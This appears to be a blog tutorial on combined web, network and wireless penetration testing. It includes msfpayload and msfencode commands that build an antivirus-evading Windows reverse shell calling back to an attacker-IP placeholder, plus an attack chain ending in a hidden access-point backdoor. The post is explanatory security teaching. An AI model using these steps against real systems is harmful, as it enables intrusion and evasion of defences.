Penetration testing part 4

Hello guys, Let continue Pen testing series. We had already covered 3 parts now let's Cover part 4.

Point of Focus

Let’s build on the concept of combined testing

We’ll discuss useful new tools and techniques

• In Part 1, the flow was 1) wireless 2) web app 3) network
• In Part 2, the flow was 1) network 2) wireless 3) web app
• To illustrate the pragmatic and iterative nature of combined tests, we’ll alter the order this time:

1) Web App attack – Discovery and exploitation (Ratproxy, Yokoso!)

2) Network exploitation – Useful Metasploit features (msfpayload, msfencode, multi-encode options for dodging Anti-Virus)

3) Wireless attack – Wireless Geo-location, GeoWig, and “Ghost in the AP” techniques

Web App Attacks 

Ratproxy: Passive 

Interception Proxy

Ratproxy is a mostly passive scanner

– Active tests are enable-able!

• Designed to proxy traffic and scan for flaws

– Based on the interplay between client and server

• Focuses on “Web 2.0” flaws

– Includes the ability to decompile and analyze Flash objects

– Was one of the first tools to find Cross-Site Request Forgery (CSRF) flaws well

• Ratproxy allows us to combine mapping the application and running a first pass looking for flaws

• Efficiency is the key!

– Chaining Ratproxy with other interception proxies that spider the site is one of our tricks

Yokoso! Infrastructure Fingerprinting

Originally designed to be an infrastructure fingerprinter

– Delivered via XSS flaws

• Contains three parts

– Lists of interesting URIs

– JavaScript code to find those URIs in browser history

– JavaScript code to find those URIs within the target network

• These parts are usable on compromised machines

– Also come bundled for use within BeEF

• The project is looking for more help collecting interesting URIs

Network Attack 

Packaging an Attack with 

msfpayload

Use the msfpayload tool in Metasploit 3.X to turn a payload into an EXE

$ ./msfpayload windows/shell/reverse_tcp LHOST=[AttackerIPaddr] LPORT=80 X

• The X generates an executable

– There are other options, including R, for raw

• We could put the payload on a USB token, send it via e-mail, put it on a file share, etc.

– Or, I don’t know… maybe deliver it via CSRF? Just wait…

• But, won’t an AV tool detect it?

– Perhaps… so let’s encode it to evade detection!

Evading IDS/IPS/AV with msfencode

Metasploit supports encoding exploits and payloads

– In msfconsole, use “show encoders” and “ set ENCODER [encoder]”

– Or, you can use msfencode program to encode a raw payload

•  The latest trunk version supports a–c [N] option, to apply N rounds of encoding

– One of the best encoders for evasion is “x86/shikata_ga_nai” –Japanese for “nothing can be done about it”

$ ./msfpayload windows/shell/reverse_tcp LHOST=[AttackerIPaddr] LPORT=80 R | ./msfencode –e x86/shikata_ga_nai –c 4 –t exe –o payload.exe

• You need to get Metasploit ready for the inbound connection:

Wireless Attacks 

Wireless Geo-Location

Question: Where is the client device I have just exploited?

– IP address information can be misleading (VPN, static, internal networks) 

– iPhone pseudo GPS uses nearby Wi-Fi and cellular towers for location analysis

• Not enough integrated GSM/EV-DO interfaces to use cell tower locations
• Wi-Fi device location database available with the WIreless Geographic Logging Engine

– www.wigle.net, inspired by wardrivers!

What Networks Are Nearby?

Vista and OSX provide command-line tools for network discovery (no love for XP). 

WiGLE Search

Tool: GeoWig

Automates searching WiGLE for BSSIDs

• Heuristics to identify APs with similar MAC addresses

– Common in corporate WLAN deployments

Ghost in the AP

Compromised APs provide tremendous value in a pen-test

• Leveraged as a network backdoor

– Configure additional virtual SSIDs

– Cloaked SSID with authorized (or similar) 

MAC address (may go unnoticed)

• Attacker can target any VLAN accessible to compromised AP!

• Cisco Aironet device as an example, applies to many device manufacturers

Dubious Configuration

A Scenario - Example for you

Analyze Website with RatProxy… Find CSRF Flaw

Build AV-Dodging Payload & 

Place on Load CSRF Trigger

Get Victim to Access CSRF, Making Browser Load Content

Other Victim Accesses Content, 

Running Reverse Shell

Use GeoWig to Verify In-Scope & 

Use Yokoso! to Admin Devices

Attack AP and Implement “Ghost in the AP”
                               

Uf, Man This is getting quite long. Hold on a very few left.

Access Target Network from Virtual AP & Attack Servers

                              

So at last we did it. That is it. Let's conclude some point for you in the end. Combined attack vectors allow for far deeper penetration into most target networks than separate vectors
– Combining web app, network, and wireless penetration testing is very powerful
• This combination provides a much more accurate view of the business risks posed by vulnerabilities than offered by completely separate network, wireless, and web app tests.

OK then see you.  Take care Buddies. Thanks for visiting. Have nice time.